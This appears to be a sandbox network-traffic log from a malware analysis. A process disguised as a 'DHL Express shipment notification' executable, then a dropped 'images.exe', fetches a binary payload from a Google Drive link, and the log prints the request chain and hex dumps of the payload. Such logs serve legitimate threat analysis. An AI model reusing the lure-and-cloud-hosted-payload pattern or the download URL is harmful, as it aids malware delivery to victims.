2021-12-01 18:25:38 UTC	155	IN	Data Raw: f3 b9 28 99 4a c8 6d 86 52 84 60 f0 df d6 98 08 44 a5 01 5d c3 90 1e be c0 44 8c 96 4b 7a fe 02 29 b2 ab 1b 46 84 1b ee ff a7 36 50 f9 8a 0b 6e 1f d7 38 c1 d9 c9 7b 07 63 8e 71 58 1c c8 b2 46 ef bc a9 dd 1e e0 10 b2 8b 06 36 2f 5c ba 5b 7d 04 5e 4c 69 21 4f c0 cc 3f b3 77 0d db 0f 35 2e cb 12 44 c6 64 c2 64 be d5 b4 1e 4f e5 10 36 89 f1 84 c8 af a3 b9 de c0 dc 58 14 e7 d9 a4 fb cf 8f 5a 7d d7 46 2e 72 1a 4c 8e db e0 47 0d 06 af 31 57 83 db eb 73 a1 5d e5 9a 92 10 79 12 70 da e3 85 62 26 34 17 f8 5f 18 f6 e6 95 b8 44 50 fe f8 6b 59 5f f9 3b 63 60 e9 d7 1c 34 d0 ca 82 fa 77 84 45 75 62 21 bf 60 56 39 e1 db 93 b0 52 a0 11 f9 9e a7 75 c4 35 72 e8 ec 99 cc 52 df 90 9a ad a7 50 38 78 49 a2 1d 54 9f 0d 95 e7 27 83 9d f9 55 91 77 07 12 9e 92 93 47 d4 30 0d 61 78 Data Ascii: (JmR`D]DKz)F6Pn8{cqXF6/\[}^Li!O?w5.DddO6XZ}F.rLG1Ws]ypb&4_DPkY_;c`4wEub!`V9Ru5rRP8xIT'UwG0ax
2021-12-01 18:25:38 UTC	156	IN	Data Raw: e6 08 17 00 e6 1f d7 a5 b3 11 c5 9d c5 00 54 ef 26 d4 10 ee d4 43 0e 6a a9 db f0 ae db 29 c0 de 20 02 6e 06 99 07 e7 38 b2 7e 10 04 02 9c b5 2d a7 7e 9c de e1 b9 17 ea 4f 14 2f 35 44 03 f1 1d f2 b3 0c 5b 0d 02 f6 14 35 4a 3e 77 fd e1 20 cd fe 4b d1 50 18 87 7e a4 d5 bd 6b ae 14 25 55 71 f2 86 06 45 33 fe 58 87 b4 83 51 c7 16 90 2e 39 48 f5 68 9f ee 32 ed 4e 51 0c 13 5d 52 44 81 e0 b9 3e 13 60 42 e1 a6 07 27 2e 66 e9 43 61 d2 60 22 33 01 6d 22 8d f8 74 fb de 0d fe 8d 25 6f 98 8a 2e fa 2d 18 a8 c4 f9 f4 5e b1 60 1b 3c f9 c1 5a 5a 60 f6 f8 4e 7d 6e fb 3c 94 0d 1c 43 c4 f4 e1 79 2b 56 24 83 71 a6 fb cd c7 6d 55 c3 ff bf 6d 56 5d ad 32 ba ec 01 71 a7 8b e5 8f 68 8a 60 7f be 1e 66 39 d8 09 48 76 69 ee 16 55 0f d2 e1 3f dd ef b4 33 f8 e7 e3 eb b8 c1 19 aa 71 c0 Data Ascii: T&Cj) n8~-~O/5D[5J>w KP~k%UqE3XQ.9Hh2NQ]RD>`B'.fCa`"3m"t%o.-^`<ZZ`N}n<Cy+V$qmUmV]2qh`f9HviU?3q
2021-12-01 18:25:38 UTC	157	IN	Data Raw: 0e db 77 20 2c 74 fe dc d8 3e e5 c4 2f 31 9d 15 77 19 0e ac 23 7b c1 84 f5 5b 55 98 b7 9e 85 f1 b8 80 b8 86 1f 52 59 9b 5e b5 1e c5 4e ca 4e f5 a7 cd fc f7 5e 7c 2d e4 37 a6 b8 95 53 1b aa 77 21 31 de 71 16 1a ee f5 c7 f0 1b 67 4d 9a 19 c9 0c 09 3f ed a5 0f 33 55 ef b1 68 1d f0 80 df 24 b0 b2 90 3c 32 d5 d4 1d 1f 43 23 b2 40 7c b3 5f 10 8d 56 60 18 cb c6 bd a2 70 ad 37 81 84 da 6b ac 27 11 fe b4 93 9f 5c 91 92 d9 ab 17 2a 8f 06 e7 d0 84 22 0b 67 1c 89 a3 e1 62 9f a1 cb 98 59 c8 cc 4d c5 8d 9e f5 43 5b 3b 08 f0 d2 e7 22 ea b3 9a 15 99 60 5f a3 c0 2c 5d f0 88 1a 09 0a 6a bc ab eb ad 1a 22 80 a1 25 08 52 4a 08 d8 81 7e 0f 12 08 53 fa f0 07 c3 33 6c ca ea 2a 1d e0 b9 23 cb 84 b0 0a 5b cc bf 20 7a ae c8 1d 9b d6 b8 94 61 d9 0d d1 9d 22 45 4d f8 ab 72 2d af f4 Data Ascii: w ,t>/1w#{[URY^NN^\|-7Sw!1qgM?3Uh$<2C#@\|_V`p7k'\"gbYMC[;"`_,]j"%RJ~S3l#[ za"EMr-

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49764	142.250.185.206	443	C:\Users\user\Desktop\DHL Express shipment notification.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:26:21 UTC	158	OUT	GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache Cookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
2021-12-01 18:26:21 UTC	159	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 01 Dec 2021 18:26:21 GMT Location: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Content-Security-Policy: script-src 'nonce-LyndeTQrDe/SVjdJSxgo6g' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-01 18:26:21 UTC	160	IN	Data Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 37 34 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 73 6b 35 6e 66 62 36 61 37 31 62 73 69 34 6b 62 30 68 6f 69 39 33 74 38 75 62 63 34 35 37 6e 39 2f 67 61 35 75 Data Ascii: 198<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5u
2021-12-01 18:26:21 UTC	160	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49765	142.250.185.161	443	C:\ProgramData\images.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:26:21 UTC	160	OUT	GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0c-74-docs.googleusercontent.com Connection: Keep-Alive
2021-12-01 18:26:22 UTC	161	IN	HTTP/1.1 302 Found X-GUploader-UploadID: ADPycdtBLuW6EDVawQw2afUlKnuxwC5UCB5DCZF6Bf2-mj-5H-tcv4oZM8s3tsLpD5WvdAZjSEbjoDgf68Q3muj3kr0Y2FtD8A Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info." Location: https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn Date: Wed, 01 Dec 2021 18:26:22 GMT Expires: Wed, 01 Dec 2021 18:26:22 GMT Cache-Control: private, max-age=0 Content-Length: 0 Server: UploadServer Set-Cookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0; Domain=doc-0c-74-docs.googleusercontent.com; Expires=Wed, 01-Dec-2021 18:36:22 GMT; Path=/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9; Secure; SameSite=none; HttpOnly Content-Type: text/html; charset=UTF-8 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49766	142.250.186.78	443	C:\ProgramData\images.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:26:22 UTC	165	OUT	GET /nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: docs.google.com Cookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
2021-12-01 18:26:22 UTC	166	IN	HTTP/1.1 302 Found Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 01 Dec 2021 18:26:22 GMT Location: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 Strict-Transport-Security: max-age=31536000 Report-To: {"group":"DriveUntrustedContentSignerHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external"}]} Content-Security-Policy: script-src 'nonce-AERwCsKQpg3A8OF1lK5IjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentSignerHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentSignerHttp/cspreport Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentSignerHttp" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49767	142.250.185.161	443	C:\ProgramData\images.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:26:22 UTC	167	OUT	GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: doc-0c-74-docs.googleusercontent.com Cookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0
2021-12-01 18:26:22 UTC	168	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduIam_2yeM-1omu88GOOFIKCe3wh_XC9aeVOIIw41zUIP3CIUPaulbP403-_DaMZPXsV8Nc-REQ70mLApeZBNAxBatZCQ Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info." Content-Type: application/octet-stream Content-Disposition: attachment;filename="wamar_ChPkMi7.bin";filename*=UTF-8''wamar_ChPkMi7.bin Content-Length: 156224 Date: Wed, 01 Dec 2021 18:26:22 GMT Expires: Wed, 01 Dec 2021 18:26:22 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=4R1wKw== Server: UploadServer Set-Cookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu=13277406679786744507Z\|1638383175000\|fbnbtom2qbkuqcm2hesnid1n96o0n4hm; Domain=.googleusercontent.com; Expires=Wed, 01-Dec-2021 18:31:22 GMT; Path=/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9; Secure; SameSite=none; HttpOnly Set-Cookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=; Domain=doc-0c-74-docs.googleusercontent.com; Expires=Tue, 30-Nov-2021 18:26:22 GMT; Path=/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9; Secure; SameSite=none; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-01 18:26:22 UTC	172	IN	Data Raw: a9 3e e5 01 df d0 81 1f 8e 73 0c 35 c6 77 5a 92 b3 87 c6 e9 89 b8 b4 3c 18 30 75 36 d3 91 4c 3a 41 80 b7 a3 cd 1f b7 c3 a2 94 5b 16 6b df d8 30 7d 04 25 47 ea 41 10 07 1b e2 07 23 e7 a8 a8 4a 46 ab c4 10 4c 1a 1a 21 96 55 fe e9 c3 7f cf eb 5b af 5f df af 8d e1 47 b7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af 71 64 40 e0 e2 61 61 d5 b7 45 83 3b 60 27 d4 32 98 b0 ff da f7 d8 4f 26 30 94 f5 39 fc 66 c1 87 81 5e a2 ba 46 9b b1 72 c0 8a e5 1c 9c 55 86 2c 0e c5 3e d0 5d 1f cc fb 58 b0 d5 83 9a c8 8f 37 9d 3a 37 86 5a cf 84 f0 de 3f 88 6e 2a 13 bb 57 e1 cc 5a cd a6 5c 1c b6 2d 06 b3 ea 14 f1 7b 85 95 8f 0f f4 37 74 f8 49 49 1b c8 96 02 d5 c5 6a 41 a9 07 1a ed 52 c4 a0 2e 06 2e 1c 56 17 c9 6a 06 fe 0b e0 3b 01 cc a2 6a a5 4f 80 6c Data Ascii: >s5wZ<0u6L:A[k0}%GA#JFL!U[_G()Xbcqd@aaE;`'2O&09f^FrU,>]X7:7Z?n*WZ\-{7tIIjAR..Vj;jOl
2021-12-01 18:26:22 UTC	176	IN	Data Raw: a0 1e 29 ee 2f 2e 96 36 57 90 14 be a9 e2 d3 38 98 58 8f b7 b2 e1 f0 1c 3b 88 ed c3 17 d1 3c 70 84 62 77 2d 49 33 9a 0f e2 74 8d d2 4b bd 62 ca e8 20 1c de 7a c9 22 32 38 0f 7a 7a 70 c1 02 dd 8a 83 f2 15 c1 65 8a 81 e6 e8 73 bf f7 c0 a6 97 e5 30 5a b0 14 e6 15 46 41 89 e7 aa 99 ea f3 10 af 76 8e 2f a5 d1 3d 13 07 6a 0c 55 d7 a3 dc 5b c3 b9 11 a9 90 2d 77 93 6e d1 52 77 09 33 a3 68 52 d1 c9 30 26 9b 4b 22 7c ec 5f 3f d8 79 c3 9f 7d b8 72 42 f4 c3 0c d1 73 c7 49 44 fe ea 0b cd e2 e5 bc bd f5 ea e6 48 3d 08 30 60 76 2a 80 79 a1 3f d2 35 8f 12 0f 80 9a 0e a3 f0 49 e9 4f 20 6b 73 c2 6a 8f c3 55 19 c4 46 f3 3c 55 5b 56 9c 6e 42 17 e5 0e c6 1f 37 90 48 31 b6 56 55 48 13 23 3b 8a 89 4d f2 f4 99 7e 33 0b b3 d7 9a c7 97 60 34 cd f8 21 e1 59 14 3f 6a d7 ef 00 c0 1f Data Ascii: )/.6W8X;<pbw-I3tKb z"28zzpes0ZFAv/=jU[-wnRw3hR0&K"\|_?y}rBsIDH=0`v*y?5IO ksjUF<U[VnB7H1VUH#;M~3`4!Y?j
2021-12-01 18:26:22 UTC	180	IN	Data Raw: a5 fc 01 b6 a0 35 2b 91 5d ff 67 0a 1a 6c ce b0 1d df 99 4a ae 8f ee a7 f0 92 2f 62 20 c6 42 c2 6a 8f 40 fb 5e 00 32 be 3c d4 4f fb 48 62 41 64 a6 a6 70 14 b4 b8 45 e2 01 ff 1f 25 2d 1e bc 64 de b3 f2 20 89 bb 18 73 7a 3b 1b a8 91 6f 34 46 a5 9f 48 c2 99 72 05 a6 64 a4 eb 56 10 94 18 2b 05 be d6 60 96 3b 7e 2f c1 5d cb f4 8c 33 f7 af 99 e6 77 da 92 3b 1a 3c 84 da 46 f0 28 40 c4 37 19 46 10 db b5 2e 5b 26 a3 15 a0 51 f6 02 1b aa 53 2d 09 84 b2 24 05 1c 75 51 49 13 37 e9 33 80 2c 9a e7 5b 21 52 49 e1 e2 e8 f9 78 b1 8d a3 40 fa 2a a2 58 ee 78 16 d8 c5 dd 7d 0b f7 32 bb 9b fd f1 d3 26 1b f9 41 d8 a7 0c 62 37 76 25 15 95 6f c2 0c eb 2e 2d 45 f6 7a 84 d7 df 1f c3 20 82 16 97 50 08 75 9d 28 44 f7 5d 95 41 11 c7 25 88 c0 69 58 db 35 62 46 8c 1f 23 b5 8c 61 26 67 Data Ascii: 5+]glJ/b Bj@^2<OHbAdpE%-d sz;o4FHrdV+`;~/]3w;<F(@7F.[&QS-$uQI73,[!RIx@*Xx}2&Ab7v%o.-Ez Pu(D]A%iX5bF#a&g
2021-12-01 18:26:22 UTC	183	IN	Data Raw: ad bd b1 64 d4 3e 1b 90 33 b9 ed 6f 1d 01 35 10 db bf cb 55 0f 21 6f 05 20 26 fb 74 2f 70 84 10 6c 5e 50 65 ac d2 1d 2a cf d6 11 7f a1 cb 43 be 59 37 13 f7 d1 24 54 f8 85 fd f6 c0 a1 6b 0c c2 7d 2c 35 45 86 43 61 89 e0 56 30 eb 44 68 dd ce 3c 4c a4 0e 81 a2 40 b9 1b 2d c7 a3 36 d3 af 76 a6 20 a5 d1 75 87 4e 82 87 46 54 d9 34 0a e0 30 50 26 0b b1 b1 97 a9 17 6b 20 30 72 28 22 50 46 46 dc fb 55 b2 9c 87 38 d2 72 5b 34 8d a2 4b 3b e6 cd ed 6c 67 f7 73 9e 92 0f ee 2c e7 88 4e 91 b2 de 3a c5 0e 97 92 ce 6e fc 2f e8 d2 f2 97 d6 f0 6a ce 12 0f 87 47 ad a3 f0 dc 34 35 39 f1 5c 82 1d 45 05 80 95 c4 ae 19 93 a4 b3 13 d0 6a 42 c2 e0 05 8f f7 61 dc b8 e4 8b 1f 05 4e 9c e5 f8 8c 9f b1 42 7f 3f 80 20 d9 0e 5c d7 4c 19 fa 10 46 f6 42 05 45 49 fd ed f1 28 5f 4b 3e b1 94 Data Ascii: d>3o5U!o &t/pl^Pe*CY7$Tk},5ECaV0Dh<L@-6v uNFT40P&k 0r("PFFU8r[4K;lgs,N:n/jG459\EjBaNB? \LFBEI(_K>
